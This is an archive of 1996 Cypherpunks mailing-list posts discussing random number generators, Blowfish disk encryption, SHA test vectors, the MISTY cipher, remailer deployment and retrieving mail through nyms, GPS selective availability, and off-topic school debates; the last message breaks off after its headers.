From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 29 Sep 1996 03:30:43 +0800
To: Cypherpunks@toad.com
Subject: Re: Mousepad RNG's?
In-Reply-To: <199609281551.IAA03203@dns2.noc.best.net>
Message-ID: <v03007800ae731f9c57fd@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:13 PM -0700 9/27/96, James A. Donald wrote:

>Some time ago, at a cypherpunks conference, people were making
>all sorts of ridiculous proposals for being really, really,
>really, sure that you had real entropy, and a prominent
>cypherpunk, possibly Tim May, said, "This is ridiculous:
>Nobody ever broke good crypto through weakness in the
>source of truly random numbers".  Sometime after that
>Netscape was broken through weakness in the source of
>truly random numbers.

This somewhat misrepresents what I said, back at that Cypherpunks meeting
in 1993-4.

The Netscape "random number generator" that was the basis of the Goldberg
and Wagner attack was not even remotely a _physical_ random number
generator, as it relied on various Unix clock readings and not on any
physical sources of entropy (such as mouse tracks, Johnson noise,
radioactivity, etc.). It was a classic case of living in a state of sin.

--Tim May



We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craigw@dg.ce.com.au
Date: Sat, 28 Sep 1996 11:18:32 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: VCRS and Crypto
Message-ID: <199609280123.LAA15458@mac.ce.com.au>
MIME-Version: 1.0
Content-Type: text/plain


If the average person cared about quality rather than what is 
marketed as bestand the must have,  we might have laser disk instead
of video rental stores. Also, where would M$ be

> >Remember the VHS/Beta VCR wars?  With a fairly equal market in about 1978,
> >Beta died 10 years later because the market couldn't support two
> >incompatible standards.  It wasn't that one was dramatically better than the
> >other, it was simply that having two standards forced the market to
> >duplicate stocks, for the machines as well as tapes, particularly
> >pre-recorded tapes.  Notice, however, that VCR's are relatively "isolated":
> >It doesn't really matter if you have one format and your neighbor has
> >another, unless you want to swap tapes.  But crypto telephones inherently
> >require (in the long term) full intercompability.  If you didn't have that,
> >there'd be half a world of people you couldn't call!
> 

        ,'~``.              \|/              ,'``~.
        (-o=o-)            (@ @)            ,(-o=o-),
+--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+
|                                                              |
|   Soon, we may all be staring at our computers, wondering    |
|               whether they're staring back.                  |
|                                                              |
| [Network Admin For WPA Business Products.  aka doshai >;-) ] |
|    .oooO        http://pip.com.au/~doshai/      Oooo.        |
|    (   )   Oooo.                        .oooO   (   )        |
+-----\ (----(   )-------oooO-Oooo--------(   )--- ) /---------+
       \_)    ) /                          \ (    (_/
             (_/                            \_)
Key fingerprint = 2D F4 54 BB B4 EA F1 E7  B6 DE 48 92 FC 8D FF 49
Send a message with the subject "send pgp-key" for a copy of my key.
(if I want to give it to you)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Sun, 29 Sep 1996 04:48:46 +0800
To: talon57@well.com
Subject: Re: [CRYPTO] (was: sig/noise ratio)
In-Reply-To: <324CBFD1.6BCB@popd.ix.netcom.com>
Message-ID: <Pine.3.89.9609281139.A7131-0100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Sep 1996, Patricia Gibbons wrote:

> > In the interest of those who wish a significant increase in the
> > signal/noise ratio I make a proposal. Significant crypto related
> > posts could be prefaced with [CRYPTO] on the subject line on a
> > strictly volunteer basis, that way those desiring a more topical
> > list could have one simply by setting the appropriate filter.
> > 
> > Items crypto related but missing the [CRYPTO] header could be
> > reposted by well meaning souls.
> > 
> > Other appropriate headers could of course be used.
> > 
> > Brian
> 
Sounds like a good idea, but what do you define as "significant crypto"?  
Also, what's to stop the anonymous idiot and several other well-known 
list.idiots from doing the same?  



Zach Babayco 

zachb@netcom.com <-------finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127
-----
If you need to know how to set up a mail filter or defend against 
emailbombs, send me a message with the words "get helpfile" (without the 
" marks) in the SUBJECT: header.  I have several useful FAQ's and documents 
available.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 29 Sep 1996 01:51:36 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Public Schools
In-Reply-To: <199609280109.UAA00349@smoke.suba.com>
Message-ID: <Pine.LNX.3.94.960928114445.4129A-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Sep 1996, snow wrote:

> Date: Fri, 27 Sep 1996 20:09:36 -0500 (CDT)
> From: snow <snow@smoke.suba.com>
> To: jbugden@smtplink.alis.ca
> Cc: cypherpunks@toad.com
> Subject: Re: Public Schools
> 
> James said:
> > ronsimpson@unidial.com wrote:
> > >I hate to burst any bubbles but, the school with the highest number
> > > of National Merit Finalists and highest number of 1600 SATs is a=20
> > > Public High School (Jefferson High in Fairfax, VA)
> > The same is true for Montreal (Royal Vale) using the equivalent scoring methods.
> > But there are public schools at both extremes of the curve.
> > While it is true that Private Schools would not survive due to market forces if
> > they did consistently poorly, it is also true that they filter their incoming
> > student body in a manner that Public Schools can not.
> > If you want to refuse those who are too stupid or anti-social from Public
> > Schools in order to improve the social or intellectual climate, you better have
> > a solution for the resulting cast-offs.
>  
>      There is a solution. Trade Schools, and Parental Envolvement. It could 
> very well be (and if I had the money I'd make the bet) that _many_ of the 
> "troubled" youth of today are simply undisiplined. (Fortunately, most of 
> them couldn't afford to bet against their parents in an AP world). It would
> also seem to follow that if parents were spending their own money (or 
> perceived it as their own money) that they would take a greater interest in
> their childrens education.
>    
>       For those that are truly not scholastically oreinted, there would be
> trade schools. I would also bet that you could teach a child everything they
> need to learn (other than a trade) to cope in this world in about 4 years. 
> 

But now we must make a disinction... I'm LD in writing, but can read very
well (when I was in 6th grade I could read like a 10th grader), and do
very well in Math and Computer classes (and non-biological/anatomical
sciences).  So should I be in trade school, because I plan on being a
computer programmer, or go to college?  Sure, I don't do well in language
and (depending on the class) some history classes, which, IMHO, are
weighted more heavily than they should be in both public _and_ private
schools (and yes, I've been to both), but I don't think that should mean I
can't go to college...

Anyway, my point is that there is, at times, a very fine line...

 --Deviant
When we write programs that "learn", it turns out we do and they don't.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 29 Sep 1996 01:58:31 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Public Schools
In-Reply-To: <v03007800ae72776fcbd0@[207.167.93.63]>
Message-ID: <Pine.LNX.3.94.960928115216.4129B-100000@anx0918.slip.appstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Sep 1996, Timothy C. May wrote:

> Date: Fri, 27 Sep 1996 22:36:57 -0800
> From: "Timothy C. May" <tcmay@got.net>
> To: cypherpunks@toad.com
> Subject: Re: Public Schools
> 
> At 3:02 AM +0000 9/28/96, attila wrote:
> 
> >        a very unusual situation  --but I live in rural southern utah
> >    where the regional middle school of 1200 can support 4 bands, the
> >    top 2 being very impressive, and provide full AP classes, and ACT
> 
> Wow! Utah is teaching AP?  Is Jim Bell being brought in as a Special Lecturer?
> 
> (I knew Idaho has special Militia classes, but to hear that Utah is now
> teaching Assassination Politics is pretty impressive.)
> 
> --Tim
> 

Umm.. I think he meant AP as in "Advanced Placement", ah la college
classes in high school.  But who knows, maybe you were being sarcastic...

 --Deviant
The first time, it's a KLUDGE!
The second, a trick.
Later, it's a well-established technique!
                -- Mike Broido, Intermetrics






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 29 Sep 1996 03:06:41 +0800
To: cypherpunks@toad.com
Subject: Re: Project Electric Potatoes [CRYPTO]
In-Reply-To: <960928093843_295524911@emout08.mail.aol.com>
Message-ID: <Pine.LNX.3.95.960928122921.190A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 28 Sep 1996 Scottauge@aol.com wrote:

> Already we are seeing problems for speech on the internet (see radikal
> postings - though they are a bit fruity IMHO.)  And it sounds like the law in
> one country is going to be very interested in arresting people in another.
> 
> Hence, perhaps we need a crypto system (including human procedures and fail
> safes) for community discussions.
> 
> Crypto is very much one to one right now, but can we implement a crypto for
> wide distribution to a very defined set of people?
> 
> This should be useful in commerce too... like CC of mail to others, etc.
> 
> Problem Definition Time:
> 
> Who will be responsible for allowing a member into the community?  (And all
> the other trust issues...)

This is one of the main problems with a system like this.  It would be very
hard to prove that a pseudonym isn't a fed.  Rather than restricting
communication to just a few people, everyone should be able to participate and
use a nym.  This would make arrests very difficult.  I think it is inevitable
that the communications would eventually be leaked to a TLA.  You might want
to look for information on PGPdomo.  This does just about everything you've
described.

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMk1VRizIPc7jvyFpAQH5ZAf/bf1kW7gsKjukaRASrppEdqgJGkWYzwXt
P+Rh2xfkR1pk9FW/7DZL3Q/OuRfYF/cdQw1qpic9ufaIkpaoA7enmoPk8V/rzGxy
opTCfrobFtA6pEGAkxcz6DP+CRB18rBo9lklkneXrs1rfR1Pd4aK7XcOCAdze865
J527kjhKGkgKLonvjDw7hdkJk5z1ov9qetByJzB8lUbKXmrMD5nm5lA/in5uqkW3
ak4cYR3yFl4/IVG9Ng0Ht3RY4gw1U9lzFKnYNlCs40gZPGIkr9kCiMR7u/HQ9jpi
T2C+JUr84Ab/C2Uj3xr0MMX7sU1o3g5sP63gEmp2AY5sz8+bWyE8zA==
=X6zq
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 29 Sep 1996 03:26:41 +0800
To: cypherpunks@toad.com
Subject: Re: WARNING: This Message Actually Contains a Question Reguarding Crypto!
In-Reply-To: <Pine.GSO.3.93.960928172435.22940D-100000@nebula>
Message-ID: <Pine.LNX.3.95.960928124335.190C-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 28 Sep 1996, Jüri Kaljundi wrote:

> A program called F-Secure Desktop for Windows 3.x and Windows 95 is using
> Blowfish with 256-bit keys. It is meant for encrypting the files on your
> hard disk and it works nicely together with Windows File Manager or
> Windows95 shell. I would say it is one of the best strong and easy to use
> HD encryption programs (only that it costs $$).
> 
> It is manufactured by Datafellows, who is also distributing F-Secure SSH.
> You can download the demo version at http://www.datafellows.com/f-secure/
> 
> Why they are using it: may be because it is fast on Intel Pentium and
> Pentium Pro processors, as discussed in Applied Cryptography? 

Blowfish is unpatented and the source code doesn't have any restrictions.  If
they used something like IDEA, they would have to pay for a license.  I don't
know if Blowfish is faster than 3DES, but if it isn't, then I have no idea why
they would use Blowfish.

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMk1WRSzIPc7jvyFpAQGM0Af9ExuNlTHG7YE9fwoZzpvx3WhF7nE1bLml
IXuNKHbXSSzaYYFi7kzz6qj/OYEI0c8J3CDL0MtF1q/z0b9xlFo5j+H5nnKtw5z+
tuM0HZcgrNepfXRMhEzEj0CI0XD1kk50kuUQmIWrt2pKkjY1hszdonWzyJx/2z6l
e8aH7ClbmgSTmTt2L/p3ts5UFWMzFH6fLwZkyhPVtu5r3gtizMZkqyF/jdGzBlqj
qiKupkJuIXe8QUrLOahWkNuHsllv4NsZVrgmP9XaMK4JdoyuITdfN73pc1v3JlZj
Ep+gmJkoVShLxgW45BQ6Axp+zXCFvA5XCQqZrLVPxCYU9Tan98YWMw==
=lumy
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 29 Sep 1996 03:10:22 +0800
To: remailer-operators@c2.net
Subject: Re: Making Remailers Widespread
In-Reply-To: <199609280358.UAA02589@dfw-ix4.ix.netcom.com>
Message-ID: <Pine.LNX.3.95.960928124949.190D-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 27 Sep 1996, Bill Stewart wrote:

> I've been thinking about how to make one-way remailers a 
> widespread commodity, rather than the novelty item they are today.
> Doing two-way remailers would be better, but that's still a hard problem,
> and I don't want to widely deploy shoddy two-way-remailers.
> 
> Suppose we add form-based remailer support to a popular SSL-equipped
> HTTP server, such as Apache-SSL, by putting remailer.pl and a 
> remailer form in the default setup, which would deploy hundreds of remailers
> with minimal effort.  What would we have to do to make it work well,
> rather than turn into a public relations disaster and spam explosion?

In addition to all the points made below, security would be extremely important
for a remailer cgi script.  If security holes were found in the source code,
it might discourage many web admins from running the script even after the hole
is patched.

> 
> - The remailer script would have to add disclaimers at the beginning
> and/or end of the message reminding readers that the message is
> anonymous, and to contact the remailer cabal rather than the postmaster.
> 
> - Blocking becomes a big problem - it's annoying enough now,
> when there are a small number of remailers with hard-working operators;
> we'd need some sort of automated blocking support to make it
> usable by relatively non-involved operators
> 
> - A centralized block list (e.g. http://www.remailer.net/block.txt)
> which all of the form-based remailers could load and reference would
> allow non-picky operators not to have to handle it themselves
> 
> - Implementing the blocking list as a web form for people who
> want to be blocked would make it relatively painless to use;
> remailer-operators wouldn't have to transcribe email from the
> remailer-operators list to use it, which helps with other problems.

Since maintaining a block list is probably one of the most time-consuming tasks
involved with operating a remailer, it would be a Good Thing to add an option
to the remailer cgi program to operate as a "middleman" remailer.  This would
only require the remailer operator to add or remove entries from a list of
allowed destinations.  The operator wouldn't have to deal with disclaimers and
would only receive complaints from other operators if the remailer is
malfunctioning in some way.

[...]
> Technical question:
> - How do we initiate an http or https PUT from a script?
>         I assume there's probably some perl add-in for posting http/https?
>         Is there a command-line-shell interface that can fetch URLs?

I don't know if any perl modules or *.ph files exist that implement http/https.
Http should be pretty easy, but https would require SSL code.  I think there
are perl modules that contain crypto functions, so https could use the
functions provided in the module.  Netcat can be used pretty easily to fetch
URLs (e.g. echo "GET /foobar.html HTTP/1.0" | nc www.webserver.com 80).  This
will print out the HTML files and cooresponding MIME headers on stdout.

Mark
- -- 
PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMk1apCzIPc7jvyFpAQGHbwgAvWQgQnZXov/u6ts2eVjbOfG0ogNpkhZa
GuZrX+hNoIJNTO+2aqeKIolnz+5rSz+80FH6iOhr96OftilFr4o7Qug2cS4zHijQ
9JBtvbZ6TljDRnogsc6LInbVz/doHr7vbQmCyFslAdo7uAd/cTK1C9X0cHKewepc
eLa1dv7qJWupcIIYy+KvhDAfGPjuhf7Q5fNYlfQlfKzdNk38ZkPEUyqLCypgQ8Hk
CH+wm5ne5EGvztnR7qgyt6XZk6CU3UQBQCfbLICIQMYdUzy/f7hCBmDjVxXXMNc7
iIAQyLG0c0BJNs4wNmFyREmnL7vbmMqwLAKvP9jk0XgRpXzY9K0cUA==
=uLlT
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 29 Sep 1996 06:22:18 +0800
To: editor@eff.org
Subject: EFF Distributes Terrorist Information On Internet - Wiretaps Needed!! :-)
Message-ID: <199609282010.NAA27339@dfw-ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The recent electronic newsletter of that suspicious organization
calling itself the EFF contains terrorist material:
> Received: (from daemon@localhost) by eff.org (8.7.5/8.6.6) id QAA17422 for 
> effector-comc-exploder; Fri, 27 Sep 1996 16:57:26 -0700 (PDT)
> ^^^^^^^^^^^^^^^^^^^^^^

Comic exploders?  How totally un-American.  They must be stopped!

Because a MIME is a terrible thing to waste....


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sun, 29 Sep 1996 07:43:12 +0800
To: cypherpunks@toad.com
Subject: [CRYPTO] Labeling messages
Message-ID: <199609282105.OAA10791@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Fart fart fart fart TWA 800 fart fart fart.  Tim May fart fart AP fart
Taxes fart fart fart.  Fart.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Sun, 29 Sep 1996 07:42:11 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: EFF Distributes Terrorist Information On Internet - Wiretaps
In-Reply-To: <199609282010.NAA27339@dfw-ix3.ix.netcom.com>
Message-ID: <199609282106.OAA25388@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


> The recent electronic newsletter of that suspicious organization
> calling itself the EFF contains terrorist material:
> > Received: (from daemon@localhost) by eff.org (8.7.5/8.6.6) id QAA17422 for 
> > effector-comc-exploder; Fri, 27 Sep 1996 16:57:26 -0700 (PDT)
> > ^^^^^^^^^^^^^^^^^^^^^^
> 
> Comic exploders?  How totally un-American.  They must be stopped!
> 
> Because a MIME is a terrible thing to waste....

Heh.

If anyone's genuinely curious, the EFFector list is big enough that we 
have it split by domain, and then by letter. effector-comc-exploder is a 
script that "explodes" EFFector to all the *@[*.]c*.com addresses on the 
list.  :)

--
<HTML><A HREF="http://www.eff.org/~mech">     Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org">          Electronic Frontier Foundation
</A><P>      Program Director    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cvhd@indyweb.net
Date: Sun, 29 Sep 1996 05:50:00 +0800
To: Jüri  Kaljundi <jk@stallion.ee>
Subject: Re: WARNING: This Message Actually Contains a Question Reguarding Crypto!
Message-ID: <3.0b26.32.19960928144259.006a5f48@indyweb.net>
MIME-Version: 1.0
Content-Type: text/plain


>A program called F-Secure Desktop for Windows 3.x and Windows 95 is using
>Blowfish with 256-bit keys. It is meant for encrypting the files on your
>hard disk and it works nicely together with Windows File Manager or
>Windows95 shell. I would say it is one of the best strong and easy to use
>HD encryption programs (only that it costs $$).

Yes,  but how "safe" is a 256-bit key with blowfish?  Would it withstand
the efforts of big bro' ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Sun, 29 Sep 1996 05:29:58 +0800
To: cypherpunks@toad.com
Subject: [CRYPTO], or hash, anyway
Message-ID: <Pine.OSF.3.91.960928150731.6406A-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


I need a copy of the appendix to the SHA FIPS pub (180-1?) that has the 
three test texts and corresponding SHA hashes, so that I can test an SHA 
implementation I'm working with.  I have tried the NIST site, and can't 
seem to get through.  If anybody has this test deal, or knows where it is 
out there on the net somewhere, please let me know.  Thanks in advance.

(My problem is I keep getting different hashes between an MS-DOS version
I'm running and one running on a Linux box, when I ftp the same files back
and forth. @#$%.  I thought maybe I was having problems with some kind of
Line-feed vs. Carriage Return/Line-feed conversion deal, but it also
generates different hashes on binary files.  So I thought I would test the
Linux and the DOS one against the specs in the FIPS, and see which one is
hosed up.)
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
     to unsubscribe, send to majordomo@toad.com a message that reads:
                        unsubscribe cypherpunks
              in the message body, not the SUBJECT: line.
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Sun, 29 Sep 1996 05:55:08 +0800
To: cypherpunks@toad.com
Subject: [NOISE, was CRYPTO], or hash, anyway
Message-ID: <Pine.OSF.3.91.960928152555.17211A-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


Please disregard earlier message about finding copy of the SHA document: 
FIPS PUB 180-1, I found it at: 
http://bilbo.isu.edu/security/isl/fip180-1.html

Thanks, anyway.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 29 Sep 1996 06:29:32 +0800
To: cypherpunks@toad.com
Subject: Re: crypto anarchy vs AP
In-Reply-To: <199609281729.KAA05451@mail.pacifier.com>
Message-ID: <aDeZuD58w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:
> On a related issue, GPS (global-positioning system) contains a de-accurizing
> mis-feature called S/A, which adds a little error to the location as
> detected by a receiver.  Ostensibly, it was added so that this could be
> turned on in wartime, to deny the enemy the ability to make 10-meter fixes.
> Turns out that it was kept on all the time, probably because if it WASN'T it
> would become politically impossible to de-accurize the system even in wartime

Two funny rumors:

1. Supposedly the DoD users of GPS have access to the accurate positioning
information at all times. (Not sure how this works - the accurate data is
encrypted?) During the Iraq war in '93 they didn't have enough equipment
to take advantage of this, so they turned off the S/A and gave everyone
(including the military users) accurate GPS on commercially available GPS
eq. Then they turned it back on.

2. The DoD is doing a study right now on how to make GPS useless to the
enemy at wartime.

I think figuring out a way to turn off A/S and getting accurage GPS on
commercial equipment at all times would make a nifty Cypherpunks project
- if it really involves breaking some encryption.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 29 Sep 1996 09:00:12 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools [NOISE]
Message-ID: <199609282255.PAA05134@dfw-ix3.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


attila:
>= .>        a very unusual situation  --but I live in rural southern
>= .> utah where the regional middle school of 1200 can support 4
>= .> bands, the top 2 being very impressive, and provide full AP
>= .> classes, and ACT
Tim:
>= .Wow! Utah is teaching AP?  Is Jim Bell being brought in as a
>= .Special Lecturer?
attilla
>        come on, Tim... you are not that old.  AP has three meanings
>    (at least):
>        1.  Associated Press (news gathering)
>        2.  Advanced Placement (as in college credit for HS classes)
>        3.  not widely known:  Jim Bell's Assassination Political

Hey, if a high school can teach kids to read the Associated Press
critically and think about what it's saying and means, they're doing
a really fine job!  For that matter, if they can teach kids to just
read the news at all, they're accomplishing something.

I was surprised by the idea of teaching Advanced Placement classes
in a middle school - in the reasonably high-quality public school I went to,
most of the AP classes were taken by 12th graders and a few by 11th-graders,
though this was partly because that's when we started getting slack in our
schedules after taking the regular courses.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 29 Sep 1996 06:41:03 +0800
To: cypherpunks@toad.com
Subject: Re: Looking for Qualified Individual/Firm to Contract for Cryptanalysis
In-Reply-To: <199609281833.EAA04360@suburbia.net>
Message-ID: <JNeZuD59w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Julian Assange <proff@suburbia.net> writes:
> > I am looking for one or more people (or firms) who are qualified to perform
> > world class cryptanalysis work.  Please send mail to me at joswald1@msn.com
> > call in the U.S. at +1 408.479.7874
> >
> > Jack Oswald
> >
>
> Find your father's little black book under the couch?

Well, I dialed the number out of curisotity (it's in San Diego). The answering
machine says "This is Jack Oswald with R.P.K." Sounds gay.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: backdraft@earthlink.net (Back Draft)
Date: Sun, 29 Sep 1996 09:13:24 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <v01530500ae736e773847@[206.149.196.146]>
MIME-Version: 1.0
Content-Type: text/plain


desubscribe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Sun, 29 Sep 1996 10:17:02 +0800
To: cypherpunks@toad.com
Subject: [NOT NOISE] Jena Remailer
Message-ID: <199609282310.QAA19716@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


 wmono@Direct.CA wrote to All:

 w> My appologies in advance to the list for this noise.  Dear Anonymous,
 w> if there is another way to contact you, please let it be known so that
 w> this need not involve the 1500 others on the list.

Noise?  Are you on drugs?  This is one of the relatively few _on-topic_
threads on this damned list these days!

If 1500 other folks can be made to give a try to the Jenaer Remailer
then this thread has served a very useful and salutary purpose.

 >> 4:  Account is automatically established and should work
 >> immediately.

 w> As soon as the mail arrives, that is correct.  If it was lost by using
 w> a non-operational remailer, or by sending a misformatted mail, then it
 w> will not.

I believe this was the problem; several of the remailers were choking
right when I was doing this experiment.  Indeed, I had to post my reply
to you here FOUR times through otherwise reliable remailers before it
ever showed up.

 w> It may be lag, it may not be.  I recommend that you create a test nym,
 w> with minimal anonymity (no remailers, send everything directly to
 w> jena) and, after waiting several hours to ensure that the key was
 w> added, send a mail from your nym to your own account.  If you get no
 w> mail after several hours, something is wrong.

This is mechanically a sound suggestion, but I believe that it is a
primary security measure to avoid any direct contact with fresh remailer,
even using a waste account.

 >>  w> - Never request a delivery to your real Email address.

 >> So here's what I really want to know:  When/if the new account is up
 >> and running, how _does_ one discreetly retrieve his mail?  I don't
 >> see how, other than to have it sent to alt.anonymous.messages via a
 >> mail2news netmail address such as
 >> alt.anonymous.messages@news.demon.co.uk and then pick through the
 >> mess there until some cyphertext message responds to his right key.

 w> That's exactly right.  We need better message pools.  Actually, what
 w> is needed is a email message pool, because of the lag and uncertainly
 w> of Usenet.  But that's a project for another day.

>From a security standpoint, to say nothing of the netmail load, I should
prefer not to use an e-mail pool, but the daunting load of spam and
clueless messages in a.a.m is a nuisance, and you are surely right about
the vagaries of Usenet connectivity.

My first thought was to have them sent to a non-autopinging *.test ng
via a well-tested parsing mail2news gate, but some autopingers ping ALL
*.test traffic passing through a site.  If these ping messages didn't
get automatically bitbucketed at the remailer site, this could be a
problem for the operator.

Anyway, let's see what happens with today's tests...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Sat, 28 Sep 1996 14:26:49 +0800
To: frantz@netcom.com
Subject: Re: Mitsubishi MISTY LSI
Message-ID: <84388570628017@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


>Does anyone have a reason not to consider this algorithm snake oil?  e.g.:
>
>Was it developed by a well known cryptographer?
>Has it been vetted by someone/some organization with reputation?
>
>I other words, why should we trust it?
 
It was developed by a team lead by Mitsuru Matsui and has been subject to
fairly intense analysis, although not by non-Mitsubishi people AFAIK.  In any
case it's not the usual snake oil.  When I last talked to someone from
Mitsubishi who was working on Misty I tried to convince them to make details
available online, you could try something like www.melco.co.jp to see if
there's anything available.
 
Peter.
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 29 Sep 1996 10:51:45 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto and six yr old sex perverts: Project Electric Potatoes [CRYPTO]
In-Reply-To: <960928093843_295524911@emout08.mail.aol.com>
Message-ID: <324DC2AB.3CE8@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Scottauge@aol.com wrote:
> Using crypto may be required to keep ya outta jail, given the
> guberment has gone so far low as to "route out this six year old sex
> pervert busy kissing the girls." (Quoted for emphasis.)
> I wonder when sexual harassment will become a sex offence.  Are the
> red sashed sex cores of Orwell's 1984 around the corner?

[remaining text and technical-related discussion deleted]

This post is a perfect example of why you'd need a comprehensive 
definition of how to use the "[CRYPTO]" string in subject headers.

Could I suggest:

1. [CRYPTO] at the extreme left for actual technical discussion (with
   examples and math, probably).
2. [CRYPTO] elsewhere in the subject line, to indicate crypto
   technically-related discussion without examples and math, as in the
   end of the Project Electric Potatoes posting.
3. [CRYPTO] nowhere in the subject line for all else.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Sun, 29 Sep 1996 00:34:01 +0800
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: WARNING: This Message Actually Contains a Question Reguarding Crypto!
